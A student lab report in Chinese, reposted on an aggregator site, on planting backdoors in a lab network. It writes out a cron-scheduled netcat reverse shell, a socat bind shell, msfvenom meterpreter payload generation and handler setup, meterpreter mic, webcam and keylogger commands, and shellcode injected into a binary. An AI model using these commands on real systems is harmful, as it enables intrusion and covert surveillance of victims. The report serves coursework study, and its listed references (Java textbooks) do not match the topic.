本文主要是介绍20192418 2021-2022-2 《网络与系统攻防技术》实验二实验报告,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
1.实验内容
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
2.实验过程
一、使用netcat获取主机操作Shell,cron启动
- 查看kali和主机的ip地址:
-
这是主机的ip地址:
-
这是kali的ip地址:
- Win10主机使用ncat程序监听本机的1221端口(端口可以随机,这里随便输入为1221)
- kali虚拟机netcat连接Win10主机,反弹shell后,成功getshell
- cron启动
- 5 * * * * nc 192.168.211.1 1221 -e /bin/sh指令:每个小时的第5分钟,反向连接Windows主机1221端口
时间到了,getshell:
二、使用socat获取主机操作Shell, 任务计划启动
- 在任务计划程序中创建任务
进入管理界面之后点击创建任务
选择触发器——>新建,并将触发器配置成下图所示:
再点击操作——>新建,在程序或脚本里面找到socat路径,在参数里面填写 tcp-listen:1221 exec:cmd.exe,pty,stderr。 把cmd.exe绑定到端口1221,同时把cmd的stderr重定向到stdout上。
按Win+L锁定主机,再解锁之后,可以发现之前创建的任务已经开始运行了:
- 通过kali连接Win10主机
输入 socat - tcp:192.168.211.1:1221 指令连接Win10主机,getshell
三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=1221 -f exe > 20192418.exe指令生成后门。
- 在Win10中使用ncat -lv 1221 > 20192418.exe指令将被控制主机进入接受文件模式
- 在kali中使用nc 192.168.72.1 1221 < 20192418.exe将后门传输过去
- 在kali上使用msfconsole指令进入msf控制台
- 输入指令进行连接
-
输入use exploit/multi/handler使用监听模块,设置payload
-
输入set payload windows/meterpreter/reverse_tcp 设置载荷,基于TCP的反向连接反弹windows shell
-
输入 set LHOST 192.168.72.128 设置本主机IP
-
输入 set LPORT 1221 设置本主机端口
-
输入exploit,等待启动后门程序
- Win10主机运行后门“20192418.exe”
- kali上getshell
四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用record_mic指令可以截获一段录音音频:
- 使用webcam_snap指令可以调用摄像头进行拍照,效果如下:
- 使用 keyscan_start 指令记录键盘输入,使用 keyscan_dump 指令读取击键记录
- 使用 screenshot 指令可以进行截屏
五、可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
获得主机shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.72.128 LPORT=2418 -x ./pwn20192418 -f elf >20192418pwnshellcode
生成完payload之后,运行MSF(具体指令参考上一过程),再运行生成的20192418pwnshellcode文件,就可以getshell了
3.问题及解决方案
- 问题1:ncat后,在cmd输入ls出现乱码
- 问题1解决方案:中文名称的文件夹和文件会乱码
-
问题2:传送后门到win10主机失败,0kb的文件且不可打开:
-
问题2解决方案:直接使用文件拖动功能把后门从linux拖动到win10主机后运行
-
问题3:生成的20192418pwn文件提示权限不够
-
问题3解决方案:通过chmod +x 2012418pwn命令修改文件权限后即可运行
4.学习感悟、思考等
基础问题回答:
- 例举你能想到的一个后门进入到你系统中的可能方式?
在非正规网站下载盗版软件,后门与盗版软件一并被下载。
- 例举你知道的后门如何启动起来(win及linux)的方式?
后台插入免杀进程,替换或感染系统文件。
- Meterpreter有哪些给你印象深刻的功能?
获取密码,下载注册表,获取系统信息等功能。
- 如何发现自己有系统有没有被安装后门?
- 定期使用杀毒软件进行查杀;
- 查看主机上是否存在可疑进程。
感悟:
在本次实验中,我学习到了后门的原理,学会了怎样去制作后门和使用后门,还有MSF的使用。这次实验的难度不大,但是在实验过程中出现了很多各种各样的小问题,但是都能自己逐个解决,通过实验提高了自己的动手能力,本次实验让我受益匪浅。
参考资料
- 《Java程序设计与数据结构教程(第二版)》
- 《Java程序设计与数据结构教程(第二版)》学习指导
- ...
这篇关于20192418 2021-2022-2 《网络与系统攻防技术》实验二实验报告的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!